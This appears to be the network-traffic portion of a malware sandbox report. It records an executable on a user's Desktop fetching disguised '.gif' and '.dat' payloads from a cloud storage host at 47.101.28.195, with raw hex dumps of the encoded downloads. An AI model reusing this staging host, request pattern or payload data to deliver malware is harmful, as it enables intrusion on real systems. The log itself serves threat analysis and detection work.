2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52 Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49988	47.101.28.195	443	3548	C:\Users\user\Desktop\13478674376-78423498.01.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:06:39 UTC	107	OUT	GET /c.gif HTTP/1.1 User-Agent: 3M Host: hdsuer.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:06:39 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:06:39 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 6784671F7125543133BD0103 Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Sun, 12 Jan 2025 11:34:48 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 3
2025-01-13 01:06:39 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 01:06:39 UTC	4096	IN	Data Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39 Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
2025-01-13 01:06:39 UTC	3034	IN	Data Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49989	47.101.28.195	443	3548	C:\Users\user\Desktop\13478674376-78423498.01.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:06:40 UTC	107	OUT	GET /d.gif HTTP/1.1 User-Agent: 3M Host: hdsuer.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:06:41 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:06:40 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 678467200D39F73837946684 Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Sun, 12 Jan 2025 11:34:55 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 16
2025-01-13 01:06:41 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
2025-01-13 01:06:41 UTC	4096	IN	Data Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49991	47.101.28.195	443	3548	C:\Users\user\Desktop\13478674376-78423498.01.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:06:49 UTC	107	OUT	GET /s.dat HTTP/1.1 User-Agent: 3M Host: hdsuer.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:06:50 UTC	559	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:06:49 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 678467298BC8013536853716 Accept-Ranges: bytes ETag: "C6997E0ED167603D63510A4881D6F34F" Last-Modified: Mon, 13 Jan 2025 01:06:34 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 6782048607062229744 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: xpl+DtFnYD1jUQpIgdbzTw== x-oss-server-time: 2
2025-01-13 01:06:50 UTC	3537	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-13 01:06:50 UTC	4096	IN	Data Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92 Data Ascii: ##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-13 01:06:50 UTC	4096	IN	Data Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
2025-01-13 01:06:50 UTC	4096	IN	Data Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b Data Ascii: 